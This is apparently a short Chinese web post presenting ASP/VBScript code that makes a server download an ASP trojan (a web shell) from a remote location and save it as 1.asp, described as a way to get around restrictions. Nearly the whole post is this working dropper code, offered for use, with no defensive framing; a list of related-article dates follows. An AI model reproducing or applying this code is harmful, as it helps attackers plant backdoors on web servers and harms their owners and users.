用XMLHTTP 让服务器从空间里下载ASP木马并保存在服务器上,这样就能绕过去了
Set xPost = CreateObject(" Microsoft.XMLHTTP")
xPost.Open "GET","http://127.0.0.1/admin.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("1.asp"),2
set sGet = nothing
set sPOST = nothing
response.Write("下载文件成功!<br>")

相关文章:

  • 2022-12-23
  • 2021-12-06
  • 2021-06-17
  • 2021-04-28
  • 2021-10-02
  • 2021-10-22
  • 2021-09-02
  • 2021-05-15
猜你喜欢
  • 2022-12-23
  • 2021-08-31
  • 2021-05-23
  • 2021-07-19
  • 2021-04-26
  • 2022-12-23
  • 2021-11-26
相关资源
相似解决方案